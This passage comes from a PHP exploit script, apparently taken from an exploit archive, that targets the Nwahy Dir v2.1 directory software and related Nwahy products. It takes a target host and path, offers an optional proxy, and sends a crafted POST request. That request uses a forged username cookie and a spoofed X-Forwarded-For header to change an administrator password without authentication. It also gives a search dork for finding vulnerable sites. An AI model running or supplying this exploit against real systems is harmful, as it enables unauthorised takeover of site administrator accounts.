......................"; }else{ [/code] [-] Works On : 1. Nwahy Articles v1 2. Nwahy scripts v1 3. Nwahy book v1 [-] Note : Path to Control Panel "/admincp/" . */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function Usage() { print "\n\n"; print "/------------------------------------------------------------\\\n"; print "| Nwahy Dir v2.1 Change Admin Password Exploit |\n"; print "\------------------------------------------------------------/\n"; print "| [-] Author : rEcruit |\n"; print "| [-] Mail : recru1t@ymail.com |\n"; print "| [-] Greetz : RAGE SCREAM , SAUDI L0rD , Fantastic Egypt |\n"; print "\------------------------------------------------------------/\n"; print "| [-] Dork : Nwahy.com 2.1 , inurl:'add-site.html' |\n"; print "| [+] Usage : php Exploit.php HOST PATH Options |\n"; print "| [-] HOST : Target server (ip/hostname) |\n"; print "| [-] PATH : Path to Nwahy Dir |\n"; print "| [-] Options : |\n"; print "| =>Proxy :(ex. 0.0.0.0:8080) |\n"; print "\------------------------------------------------------------/\n"; print "\n\n"; exit; } function Send() { Global $host,$path,$user,$pwd,$proxy; if(empty($proxy)) { $Connect = @fsockopen($host,"80") or die("[-] Bad Host ."); }else{ $proxy = explode(":",$proxy); $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy ."); } $Payload = "username={$user}&password={$pwd}"; $Packet .= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n"; $Packet .= "Host: {$host}\r\n"; $Packet .= "Cookie: username={$user}\r\n"; $Packet .= "X-Forwarded-For: 127.0.0.1\r\n"; $Packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $Packet .= "Content-Length: ".(strlen($Payload))."\r\n"; $Packet .= "Connection: close\r\n\r\n"; $Packet .= $Payload; fputs($Connect,$Packet); while(!feof($Connect)) $Response .= @fgets($Connect,2048); fclose($Connect); return $Response; } function Login() { $Response = @Send(); if(eregi("refresh",$Response)) { $msg = "[-] Password changed .\n"; } elseif(eregi("

",$Response)) { $msg = "[-] Bad username .\n"; } else { $msg = "[-] Exploit failed .\n"; } return $msg; } if ($argc < 3) Usage(); $host = $argv[1]; $path = $argv[2];; $proxy = $argv[3]; Print "\r\n[-] Connecting to {$host} .... \r\n"; while(1) { Print "[-] Username: "; if($user = str_replace (" ", "%20", trim(fgets(STDIN)))) { Print "[-] New password: "; if($pwd = str_replace (" ", "%20", trim(fgets(STDIN)))) { Print Login(); exit; } } } //end while ?>